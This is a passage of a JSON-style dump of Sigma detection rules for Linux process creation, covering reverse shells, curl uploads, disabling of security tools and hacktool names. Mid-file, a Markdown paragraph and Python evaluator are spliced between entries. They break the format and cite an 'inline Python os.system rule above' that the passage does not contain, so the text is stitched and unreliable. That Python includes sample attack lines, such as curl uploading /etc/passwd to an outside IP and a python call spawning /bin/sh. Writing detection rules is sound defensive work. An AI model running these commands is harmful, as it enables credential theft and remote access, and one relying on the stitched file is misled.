    "content": "title: Suspicious Invocation of Shell via Rsync\nid: 297241f3-8108-4b3a-8c15-2dda9f844594\nstatus: experimental\ndescription: |\n    Detects the execution of a shell as sub process of \"rsync\" without the expected command line flag \"-e\" being used, which could be an indication of exploitation as described in CVE-2024-12084. This behavior is commonly associated with attempts to execute arbitrary commands or escalate privileges, potentially leading to unauthorized access or further exploitation.\nreferences:\n    - https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/\n    - https://gist.github.com/Neo23x0/a20436375a1e26524931dd8ea1a3af10\nauthor: Florian Roth\ndate: 2025-01-18\ntags:\n    - attack.execution\n    - attack.t1059\n    - attack.t1203\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '/rsync'\n            - '/rsyncd'\n        Image|endswith:\n            - '/ash'\n            - '/bash'\n            - '/csh'\n            - '/dash'\n            - '/ksh'\n            - '/sh'\n            - '/tcsh'\n            - '/zsh'\n    filter_main_expected:\n        CommandLine|contains: ' -e '\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml",
    "content": "title: Potential Ruby Reverse Shell\nid: b8bdac18-c06e-4016-ac30-221553e74f59\nstatus: test\ndescription: Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. This could be an indication of a potential attempt to set up a reverse shell.\nreferences:\n    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet\n    - https://www.revshells.com/\nauthor: '@d4ns4n_'\ndate: 2023-04-07\ntags:\n    - attack.execution\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|contains: 'ruby'\n        CommandLine|contains|all:\n            - ' -e'\n            - 'rsocket'\n            - 'TCPSocket'\n        CommandLine|contains:\n            - ' ash'\n            - ' bash'\n            - ' bsh'\n            - ' csh'\n            - ' ksh'\n            - ' pdksh'\n            - ' sh'\n            - ' tcsh'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml",
    "content": "title: Scheduled Cron Task/Job - Linux\nid: 6b14bac8-3e3a-4324-8109-42f0546a347f\nstatus: test\ndescription: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md\nauthor: Alejandro Ortuno, oscd.community\ndate: 2020-10-06\nmodified: 2022-11-27\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1053.003\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: 'crontab'\n        CommandLine|contains: '/tmp/'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_security_software_discovery.yml",
    "content": "title: Security Software Discovery - Linux\nid: c9d8b7fd-78e4-44fe-88f6-599135d46d60\nstatus: test\ndescription: Detects usage of system utilities (only grep and egrep for now) to discover installed security software\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nauthor: Daniil Yugoslavskiy, oscd.community\ndate: 2020-10-19\nmodified: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1518.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            # You can add more grep variations such as fgrep, rgrep...etc\n            - '/grep'\n            - '/egrep'\n        CommandLine|contains:\n            - 'nessusd'        # nessus vulnerability scanner\n            - 'td-agent'       # fluentd log shipper\n            - 'packetbeat'     # elastic network logger/shipper\n            - 'filebeat'       # elastic log file shipper\n            - 'auditbeat'      # elastic auditing agent/log shipper\n            - 'osqueryd'       # facebook osquery\n            - 'cbagentd'       # carbon black\n            - 'falcond'        # crowdstrike falcon\n    condition: selection\nfalsepositives:\n    - Legitimate activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_security_tools_disabling.yml",
    "content": "title: Disabling Security Tools\nid: e3a8a052-111f-4606-9aee-f28ebeb76776\nstatus: test\ndescription: Detects attempts to stop or disable security tools such as iptables, firewalld, SELinux enforcement, Carbon Black or the CrowdStrike Falcon sensor\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nauthor: Ömer Günal, Alejandro Ortuno, oscd.community\ndate: 2020-06-17\nmodified: 2022-10-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_iptables_1:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'iptables'\n            - 'stop'\n    selection_iptables_2:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'ip6tables'\n            - 'stop'\n    selection_iptables_3:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'iptables'\n            - 'stop'\n    selection_iptables_4:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'ip6tables'\n            - 'stop'\n    selection_firewall_1:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'firewalld'\n            - 'stop'\n    selection_firewall_2:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'firewalld'\n            - 'disable'\n    selection_carbonblack_1:\n        Image|endswith: '/service'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'stop'\n    selection_carbonblack_2:\n        Image|endswith: '/chkconfig'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'off'\n    selection_carbonblack_3:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'stop'\n    selection_carbonblack_4:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'cbdaemon'\n            - 'disable'\n    selection_selinux:\n        Image|endswith: '/setenforce'\n        CommandLine|contains: '0'\n    selection_crowdstrike_1:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'stop'\n            - 'falcon-sensor'\n    selection_crowdstrike_2:\n        Image|endswith: '/systemctl'\n        CommandLine|contains|all:\n            - 'disable'\n            - 'falcon-sensor'\n    condition: 1 of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml",
    "content": "title: Disable Or Stop Services\nid: de25eeb8-3655-4643-ac3a-b662d3f26b6b\nstatus: test\ndescription: Detects the usage of utilities such as 'systemctl', 'service' or 'chkconfig' to stop or disable tools and services\nreferences:\n    - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/service'\n            - '/systemctl'\n            - '/chkconfig'\n        CommandLine|contains:\n            - 'stop'\n            - 'disable'\n    condition: selection\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml",
    "content": "title: Setuid and Setgid\nid: c21c4eaa-ba2e-419a-92b2-8371703cbe21\nstatus: test\ndescription: Detects suspicious change of file privileges with chown and chmod commands\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md\nauthor: Ömer Günal\ndate: 2020-06-16\nmodified: 2022-10-05\ntags:\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1548.001\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_root:\n        CommandLine|contains: 'chown root'\n    selection_perm:\n        CommandLine|contains:\n            - ' chmod u+s'\n            - ' chmod g+s'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate administration activities\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml",
    "content": "title: Shell Invocation Via Ssh - Linux\nid: 8737b7f6-8df3-4bb7-b1da-06019b99b687\nstatus: test\ndescription: |\n    Detects the use of the \"ssh\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\nreferences:\n    - https://gtfobins.github.io/gtfobins/ssh/\n    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html\nauthor: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)\ndate: 2024-08-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/ssh'\n        CommandLine|contains:\n            - 'ProxyCommand=;'\n            - 'permitlocalcommand=yes'\n            - 'localhost'\n    selection_cli:\n        CommandLine|contains:\n            - '/bin/bash'\n            - '/bin/dash'\n            - '/bin/fish'\n            - '/bin/sh'\n            - '/bin/zsh'\n            - 'sh 0<&2 1>&2'\n            - 'sh 1>&2 0<&2'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml",
    "content": "title: Potential Linux Amazon SSM Agent Hijacking\nid: f9b3edc5-3322-4fc7-8aa3-245d646cc4b7\nstatus: test\ndescription: Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.\nreferences:\n    - https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan\n    - https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/\n    - https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/\nauthor: Muhammad Faisal\ndate: 2023-08-03\ntags:\n    - attack.command-and-control\n    - attack.persistence\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/amazon-ssm-agent'\n        CommandLine|contains|all:\n            - '-register '\n            - '-code '\n            - '-id '\n            - '-region '\n    condition: selection\nfalsepositives:\n    - Legitimate activity of system administrators\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_chmod_directories.yml",
    "content": "title: Chmod Suspicious Directory\nid: 6419afd1-3742-47a5-a7e6-b50386cd15f8\nstatus: test\ndescription: Detects chmod targeting files in abnormal directory paths.\nreferences:\n    - https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nauthor: 'Christopher Peacock @SecurePeacock, SCYTHE @scythe_io'\ndate: 2022-06-03\ntags:\n    - attack.defense-evasion\n    - attack.t1222.002\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|endswith: '/chmod'\n        CommandLine|contains:\n            - '/tmp/'\n            - '/.Library/'\n            - '/etc/'\n            - '/opt/'\n    condition: selection\nfalsepositives:\n    - Admin changing file permissions.\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml",
    "content": "title: Container Residence Discovery Via Proc Virtual FS\nid: 746c86fb-ccda-4816-8997-01386263acc4\nstatus: test\ndescription: Detects potential container discovery via listing of certain kernel features in the \"/proc\" virtual filesystem\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_tools:\n        Image|endswith:\n            - 'awk'\n            - '/cat'\n            - 'grep'\n            - '/head'\n            - '/less'\n            - '/more'\n            - '/nl'\n            - '/tail'\n    selection_procfs_kthreadd:  # outside containers, PID 2 == kthreadd\n        CommandLine|contains: '/proc/2/'\n    selection_procfs_target:\n        CommandLine|contains: '/proc/'\n        CommandLine|endswith:\n            - '/cgroup'  # cgroups end in ':/' outside containers\n            - '/sched'   # PID mismatch when run in containers\n    condition: selection_tools and 1 of selection_procfs_*\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml",
    "content": "title: Suspicious Curl File Upload - Linux\nid: 00b90cc1-17ec-402c-96ad-3a8117d7a582\nrelated:\n    - id: 00bca14a-df4e-4649-9054-3f2aa676bc04\n      type: derived\nstatus: test\ndescription: Detects a suspicious curl process start that adds a file to a web request\nreferences:\n    - https://twitter.com/d1r4c/status/1279042657508081664\n    - https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file\n    - https://curl.se/docs/manpage.html\n    - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html\nauthor: Nasreddine Bencherchali (Nextron Systems), Cedric MAURUGEON (Update)\ndate: 2022-09-15\nmodified: 2023-05-02\ntags:\n    - attack.exfiltration\n    - attack.command-and-control\n    - attack.t1567\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/curl'\n    selection_cli:\n        - CommandLine|contains:\n              - ' --form' # Also covers the \"--form-string\"\n              - ' --upload-file '\n              - ' --data '\n              - ' --data-' # For flags like: \"--data-ascii\", \"--data-binary\", \"--data-raw\", \"--data-urlencode\"\n        - CommandLine|re: '\\s-[FTd]\\s' # We use regex to ensure a case sensitive argument detection\n    filter_optional_localhost:\n        CommandLine|contains:\n            - '://localhost'\n            - '://127.0.0.1'\n    condition: all of selection_* and not 1 of filter_optional_*\nfalsepositives:\n    - Scripts created by developers and admins\nlevel: medium\n"
  },
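The inline Python `os.system` rule and the curl upload rule above rely on the same handful of Sigma field modifiers. What follows is an added example, not code from the SigmaHQ repository or from any Sigma backend: it implements only those modifiers in Python and runs both detection blocks over constructed process_creation events (the interpreter path, hosts, file names and command lines are made up). It shows the OR semantics of a selection written as a list of maps (`selection_img`, `selection_cli`), the default case-insensitive string matching versus the case-sensitive `re` modifier that the curl rule's comment depends on, and the effect of the `filter_optional_localhost` exclusion.

```python
import re

# Added example, not SigmaHQ code: a minimal evaluator for the Sigma field
# modifiers used by the two rules, run on constructed process_creation events.

def _field_matches(event, key, patterns):
    """Evaluate one 'Field|modifier[|all]' entry of a selection against an event.

    Sigma string matching is case-insensitive by default; only the 're'
    modifier is case-sensitive, hence the curl rule's regex for one-letter flags.
    """
    field, *mods = key.split("|")
    value = event.get(field)
    if value is None:
        return False
    patterns = patterns if isinstance(patterns, list) else [patterns]
    if "re" in mods:
        hits = [re.search(p, value) is not None for p in patterns]
    else:
        v, ps = value.lower(), [p.lower() for p in patterns]
        if "endswith" in mods:
            hits = [v.endswith(p) for p in ps]
        elif "startswith" in mods:
            hits = [v.startswith(p) for p in ps]
        elif "contains" in mods:
            hits = [p in v for p in ps]
        else:
            hits = [v == p for p in ps]
    return all(hits) if "all" in mods else any(hits)

def _selection_matches(event, selection):
    """A selection written as a list of maps is OR-ed; keys in one map are AND-ed."""
    if isinstance(selection, list):
        return any(_selection_matches(event, s) for s in selection)
    return all(_field_matches(event, k, v) for k, v in selection.items())

def _of(event, detection, prefix, need_all):
    """'all of <prefix>*' when need_all is True, '1 of <prefix>*' otherwise."""
    hits = [_selection_matches(event, s)
            for name, s in detection.items() if name.startswith(prefix)]
    return bool(hits) and (all(hits) if need_all else any(hits))

def evaluate(rule, event):
    """Return True when the rule's condition holds for the event."""
    det = rule["detection"]
    return rule["condition"](lambda p: _of(event, det, p, True),
                             lambda p: _of(event, det, p, False))

# Detection blocks transcribed from the two rules; each condition string is
# written as a callable taking (all_of, one_of).
PYTHON_OS_SYSTEM_SHELL = {
    "title": "Inline Python Execution - Spawn Shell Via OS System Library",
    "detection": {
        "selection_img": [
            {"Image|endswith": ["/python", "/python2", "/python3"]},
            {"Image|contains": ["/python2.", "/python3."]},
        ],
        "selection_cli": {
            "CommandLine|contains|all": [" -c ", "os.system("],
            "CommandLine|contains": ["/bin/bash", "/bin/dash", "/bin/fish",
                                     "/bin/sh", "/bin/zsh"],
        },
    },
    "condition": lambda all_of, one_of: all_of("selection_"),
}

CURL_FILE_UPLOAD = {
    "title": "Suspicious Curl File Upload - Linux",
    "detection": {
        "selection_img": {"Image|endswith": "/curl"},
        "selection_cli": [
            {"CommandLine|contains": [" --form", " --upload-file ", " --data ", " --data-"]},
            {"CommandLine|re": r"\s-[FTd]\s"},  # case-sensitive: -F/-T/-d, not -f/-t/-D
        ],
        "filter_optional_localhost": {"CommandLine|contains": ["://localhost", "://127.0.0.1"]},
    },
    "condition": lambda all_of, one_of: all_of("selection_") and not one_of("filter_optional_"),
}

# Constructed sample events (made-up paths, hosts and command lines).
SAMPLE_EVENTS = {
    "py_shell": {"Image": "/usr/bin/python3.11",  # resolved path, hence '/python3.'
                 "CommandLine": "python3 -c \"import os; os.system('/bin/sh')\""},
    "py_benign": {"Image": "/usr/bin/python3.11",
                  "CommandLine": "python3 -c \"import os; print(os.getcwd())\""},
    "curl_form": {"Image": "/usr/bin/curl",
                  "CommandLine": "curl -F 'f=@/etc/passwd' https://203.0.113.5/up"},
    "curl_fail_flag": {"Image": "/usr/bin/curl",  # lower-case -f is 'fail', not '--form'
                       "CommandLine": "curl -f -sSL https://deb.example.org/key.gpg"},
    "curl_localhost": {"Image": "/usr/bin/curl",  # excluded by filter_optional_localhost
                       "CommandLine": "curl --data @/etc/shadow http://127.0.0.1:9000/"},
}

def run_samples():
    """Map each sample event name to the titles of the rules that fire on it."""
    rules = [PYTHON_OS_SYSTEM_SHELL, CURL_FILE_UPLOAD]
    return {name: [r["title"] for r in rules if evaluate(r, ev)]
            for name, ev in SAMPLE_EVENTS.items()}

if __name__ == "__main__":
    for name, hits in run_samples().items():
        print(f"{name:15} -> {hits or 'no match'}")
```

Run it directly to print which rule fires on each sample: only the Python shell spawn and `curl -F` should match, while `curl -f` (the lower-case "fail" flag) and the `--data` upload to 127.0.0.1 should not. A real backend such as pySigma implements these semantics for its target query language; the evaluator here is only a readable stand-in for checking what a rule's logic means before deploying it.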
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml",
    "content": "title: Suspicious Curl Change User Agents - Linux\nid: b86d356d-6093-443d-971c-9b07db583c68\nrelated:\n    - id: 3286d37a-00fd-41c2-a624-a672dcd34e60\n      type: derived\nstatus: test\ndescription: Detects a suspicious curl process start on Linux with a custom user agent set via the \"-A\" or \"--user-agent\" option\nreferences:\n    - https://curl.se/docs/manpage.html\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-09-15\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/curl'\n        CommandLine|contains:\n            - ' -A '\n            - ' --user-agent '\n    condition: selection\nfalsepositives:\n    - Scripts created by developers and admins\n    - Administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml",
    "content": "title: Docker Container Discovery Via Dockerenv Listing\nid: 11701de9-d5a5-44aa-8238-84252f131895\nstatus: test\ndescription: Detects listing or file reading of \".dockerenv\", which can be a sign of potential container discovery\nreferences:\n    - https://blog.skyplabs.net/posts/container-detection/\n    - https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\ntags:\n    - attack.discovery\n    - attack.t1082\nauthor: Seth Hanford\ndate: 2023-08-23\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            # Note: add additional tools and utilities to increase coverage\n            - '/cat'\n            - '/dir'\n            - '/find'\n            - '/ls'\n            - '/stat'\n            - '/test'\n            - 'grep'\n        CommandLine|endswith: '.dockerenv'\n    condition: selection\nfalsepositives:\n    - Legitimate system administrator usage of these commands\n    - Some container tools or deployments may use these techniques natively to determine how they proceed with execution, and will need to be filtered\nlevel: low\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_execution_tmp_folder.yml",
    "content": "title: Potentially Suspicious Execution From Tmp Folder\nid: 312b42b1-bded-4441-8b58-163a3af58775\nstatus: test\ndescription: Detects a potentially suspicious execution of a process located in the '/tmp/' folder\nreferences:\n    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html\n    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/\n    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection\n    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk\ndate: 2023-06-02\nmodified: 2025-08-05\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection:\n        Image|startswith: '/tmp/'\n    filter_optional_nextcloud:\n        Image|endswith: '/usr/bin/nextcloud'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml",
    "content": "title: Potential Discovery Activity Using Find - Linux\nid: 8344c0e5-5783-47cc-9cf9-a0f7fd03e6cf\nrelated:\n    - id: 85de3a19-b675-4a51-bfc6-b11a5186c971\n      type: similar\nstatus: test\ndescription: Detects usage of \"find\" binary in a suspicious manner to perform discovery\nreferences:\n    - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-28\ntags:\n    - attack.discovery\n    - attack.t1083\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith: '/find'\n        CommandLine|contains:\n            - '-perm -4000'\n            - '-perm -2000'\n            - '-perm 0777'\n            - '-perm -222'\n            - '-perm -o w'\n            - '-perm -o x'\n            - '-perm -u=s'\n            - '-perm -g=s'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml",
    "content": "title: Suspicious Git Clone - Linux\nid: cfec9d29-64ec-4a0f-9ffe-0fdb856d5446\nstatus: test\ndescription: Detects execution of \"git\" in order to clone a remote repository whose URL contains suspicious keywords such as exploit names or CVE identifiers\nreferences:\n    - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-03\nmodified: 2023-01-05\ntags:\n    - attack.reconnaissance\n    - attack.t1593.003\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection_img:\n        Image|endswith: '/git'\n        CommandLine|contains: ' clone '\n    selection_keyword:\n        CommandLine|contains:\n            # Add more suspicious keywords\n            - 'exploit'\n            - 'Vulns'\n            - 'vulnerability'\n            - 'RCE'\n            - 'RemoteCodeExecution'\n            - 'Invoke-'\n            - 'CVE-'\n            - 'poc-'\n            - 'ProofOfConcept'\n            # Add more vuln names\n            - 'proxyshell'\n            - 'log4shell'\n            - 'eternalblue'\n            - 'eternal-blue'\n            - 'MS17-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml",
    "content": "title: History File Deletion\nid: 1182f3b3-e716-4efa-99ab-d2685d04360f\nstatus: test\ndescription: Detects events in which a history file gets deleted, e.g. the ~/.bash_history, to remove traces of malicious activity\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-09-15\ntags:\n    - attack.impact\n    - attack.t1565.001\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/rm'\n            - '/unlink'\n            - '/shred'\n    selection_history:\n        - CommandLine|contains:\n              - '/.bash_history'\n              - '/.zsh_history'\n        - CommandLine|endswith:\n              - '_history'\n              - '.history'\n              - 'zhistory'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml",
    "content": "title: Print History File Contents\nid: d7821ff1-4527-4e33-9f84-d0d57fa2fb66\nstatus: test\ndescription: Detects events in which someone prints the contents of history files to the command line or redirects them to a file for reconnaissance\nreferences:\n    - https://github.com/sleventyeleven/linuxprivchecker/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-06-20\nmodified: 2022-09-15\ntags:\n    - attack.reconnaissance\n    - attack.t1592.004\nlogsource:\n    category: process_creation\n    product: linux\ndetection:\n    selection:\n        Image|endswith:\n            - '/cat'\n            - '/head'\n            - '/tail'\n            - '/more'\n    selection_history:\n        - CommandLine|contains:\n              - '/.bash_history'\n              - '/.zsh_history'\n        - CommandLine|endswith:\n              - '_history'\n              - '.history'\n              - 'zhistory'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate administration activities\nlevel: medium\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml",
    "content": "title: Linux HackTool Execution\nid: a015e032-146d-4717-8944-7a1884122111\nstatus: test\ndescription: Detects known hacktool execution based on image name.\nreferences:\n    - https://github.com/Gui774ume/ebpfkit\n    - https://github.com/pathtofile/bad-bpf\n    - https://github.com/carlospolop/PEASS-ng\n    - https://github.com/t3l3machus/hoaxshell\n    - https://github.com/t3l3machus/Villain\n    - https://github.com/HavocFramework/Havoc\n    - https://github.com/1N3/Sn1per\n    - https://github.com/Ne0nd0g/merlin\n    - https://github.com/Pennyw0rth/NetExec/\nauthor: Nasreddine Bencherchali (Nextron Systems), Georg Lauenstein (sure[secure])\ndate: 2023-01-03\nmodified: 2024-09-19\ntags:\n    - attack.execution\n    - attack.resource-development\n    - attack.t1587\nlogsource:\n    product: linux\n    category: process_creation\ndetection:\n    selection_c2_frameworks:\n        Image|endswith:\n            - '/crackmapexec'\n            - '/havoc'\n            - '/merlin-agent'\n            - '/merlinServer-Linux-x64'\n            - '/msfconsole'\n            - '/msfvenom'\n            - '/ps-empire server'\n            - '/ps-empire'\n            - '/sliver-client'\n            - '/sliver-server'\n            - '/Villain.py'\n    selection_c2_framework_cobaltstrike:\n        Image|contains:\n            - '/cobaltstrike'\n            - '/teamserver'\n    selection_scanners:\n        Image|endswith:\n            - '/autorecon'\n            - '/httpx'\n            - '/legion'\n            - '/naabu'\n            - '/netdiscover'\n            - '/nuclei'\n            - '/recon-ng'\n    selection_scanners_sniper:\n        Image|contains: '/sniper'\n    selection_web_enum:\n        Image|endswith:\n            - '/dirb'\n            - '/dirbuster'\n            - '/eyewitness'\n            - '/feroxbuster'\n            - '/ffuf'\n            - '/gobuster'\n            - '/wfuzz'\n            - '/whatweb'\n    selection_web_vuln:\n        Image|endswith:\n            - '/joomscan'\n            - '/nikto'\n            - '/wpscan'\n    selection_exploit_tools:\n        Image|endswith:\n            - '/aircrack-ng'\n            - '/bloodhound-python'\n            - '/bpfdos'\n            - '/ebpfki'\n            - '/evil-winrm'\n            - '/hashcat'\n            - '/hoaxshell.py'\n            - '/hydra'\n            - '/john'\n            - '/ncrack'\n            # default binary: https://github.com/Pennyw0rth/NetExec/releases/download/v1.0.0/nxc-ubuntu-latest\n            - '/nxc-ubuntu-latest'\n            - '/pidhide'\n            - '/pspy32'\n            - '/pspy32s'\n            - '/pspy64'\n            - '/pspy64s'\n            - '/setoolkit'\n            - '/sqlmap'\n            - '/writeblocker'\n    selection_linpeas:\n        # covers: all linux versions listed here: https://github.com/carlospolop/PEASS-ng/releases\n        Image|contains: '/linpeas'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml",
